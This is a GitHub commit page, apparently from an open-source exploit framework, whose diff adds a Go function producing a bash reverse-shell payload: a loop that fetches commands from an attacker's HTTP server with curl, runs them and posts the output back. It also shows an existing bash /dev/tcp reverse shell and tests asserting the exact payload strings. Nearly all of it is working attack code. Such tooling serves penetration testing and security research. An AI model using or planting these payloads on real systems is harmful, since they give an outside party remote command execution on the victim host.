Skip to content

Commit 186cee9

Browse files
j-bainesj-baines
authored
Merge pull request #378 from vulncheck-oss/payload/httpshellserver-shell
Add shell script loop payload for HTTPServeShell
2 parents a5d2ebf + 3114f0b commit 186cee9

File tree

2 files changed

+29
-0
lines changed

2 files changed

+29
-0
lines changed

payload/reverse/bash.go

Lines changed: 13 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -7,6 +7,7 @@ import (
77
const (
88
BashDefault = BashTCPRedirection
99
BashTCPRedirection = `bash -c 'bash &> /dev/tcp/%s/%d <&1'`
10+
BashHTTPShellLoop = `bash -c 'while :; do curl -d "$(bash -c "$(curl %s-H"VC-Auth: %s" %s://%s:%d || exit)")" %s-H"VC-Auth: %s" %s://%s:%d/rx ||exit;sleep 1;done'`
1011
)
1112

1213
// The default payload type for reverse bash utilizes the pseudo-dev networking redirects in default bash.
@@ -18,3 +19,15 @@ func (bash *BashPayload) Default(lhost string, lport int) string {
1819
func (bash *BashPayload) TCPRedirection(lhost string, lport int) string {
1920
return fmt.Sprintf(BashDefault, lhost, lport)
2021
}
22+
23+
// An infinite loop shell script that will stay running until the HTTP server fails to respond.
24+
// This fits the c2.HTTPShellServer C2 logic in a shell script form.
25+
func (bash *BashPayload) HTTPShellLoop(lhost string, lport int, ssl bool, auth string) string {
26+
k := ``
27+
h := `http`
28+
if ssl {
29+
h = "https"
30+
k = `-k `
31+
}
32+
return fmt.Sprintf(BashHTTPShellLoop, k, auth, h, lhost, lport, k, auth, h, lhost, lport)
33+
}

payload/reverse/reverse_test.go

Lines changed: 16 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -24,6 +24,22 @@ func TestBashDefault(t *testing.T) {
2424
t.Log(payload)
2525
}
2626

27+
func TestBashHTTPShellLoop(t *testing.T) {
28+
payload := reverse.Bash.HTTPShellLoop("127.0.0.1", 4444, true, "vulncheck")
29+
30+
if payload != `bash -c 'while :; do curl -d "$(bash -c "$(curl -k -H"VC-Auth: vulncheck" https://127.0.0.1:4444 || exit)")" -k -H"VC-Auth: vulncheck" https://127.0.0.1:4444/rx ||exit;sleep 1;done'` {
31+
t.Fatal(payload)
32+
}
33+
34+
payload = reverse.Bash.HTTPShellLoop("127.0.0.1", 4444, false, "vulncheck")
35+
36+
if payload != `bash -c 'while :; do curl -d "$(bash -c "$(curl -H"VC-Auth: vulncheck" http://127.0.0.1:4444 || exit)")" -H"VC-Auth: vulncheck" http://127.0.0.1:4444/rx ||exit;sleep 1;done'` {
37+
t.Fatal(payload)
38+
}
39+
40+
t.Log(payload)
41+
}
42+
2743
func TestNetcatGaping(t *testing.T) {
2844
payload := reverse.Netcat.Default("127.0.0.1", 4444)
2945

0 commit comments

Comments
 (0)